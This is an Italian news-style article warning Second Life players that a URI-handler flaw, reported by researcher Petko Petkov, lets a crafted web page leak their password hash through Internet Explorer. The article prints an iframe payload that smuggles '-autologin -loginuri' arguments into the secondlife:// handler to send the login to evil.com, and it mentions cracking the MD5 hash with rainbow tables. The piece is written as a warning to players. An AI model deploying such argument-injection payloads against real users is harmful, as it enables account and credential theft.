Second (True) Life

Anche se realizzato con i migliori software di computergrafica Second Life rappresenta una vera e propria vita parallela dove potersi intrattenere nel proprio tempo libero e chissà riuscire a costruire un impero economico grazie solo ad un mondo virtuale.

Per chi fosse all'oscuro di questo stupendo gioco, esso vi permetterà di creare un personaggio che vivrà e guadagnerà come un essere umano; mediante la vostra carta di credito potrete acquistare beni o terreni, creare aziende o attività ricevendo da questi possibili profitti reali. Per tirare giù un pò di numeri possiamo dire che nelle ultime 24 ore per giocare sono stati spesi circa 1.120.000 dollari americani con un numero di residenti che arriva a toccare i 10 milioni.

Il problema sta nel fatto che in questo contesto ogni proprietà virtuale ha un controvalore economico reale; impossessarsi illegalmente di un personaggio altrui dunque può essere paragonato al furto dei codici di una postepay o di un conto economico.

Ed è in questo caso che Petko Petkov vuole mettere in guardia tutti i giocatori. Secondo il ricercatore infatti, Internet Explorer sarebbe colpevole perchè in grado di svelare a terzi la password utente. Visitando una pagina costruita ad hoc con tag <iframe>, l'uri handler associato al programma consentirebbe la sua esecuzione

<iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe>

generando una richiesta XML-RPC verso l'host evil.com. Tale richiesta conterrà tra le diverse informazioni anche i seguenti tags:

<member>
  <name>passwd</name>
     <value>
           <string>$1$[MD5 Hash della password]</string>
     </value>
</member>

mettendo così a rischio "la vita" del personaggio o per dirla semplicemente, il nostro portafogli.

Poco importa se la password è in formato hash md5; l' attaccante può farne un reverse mediante rainbow table o forgiare direttamente la richiesta ai server di autenticazione SecondLife.

Giocatori quindi fate attenzione!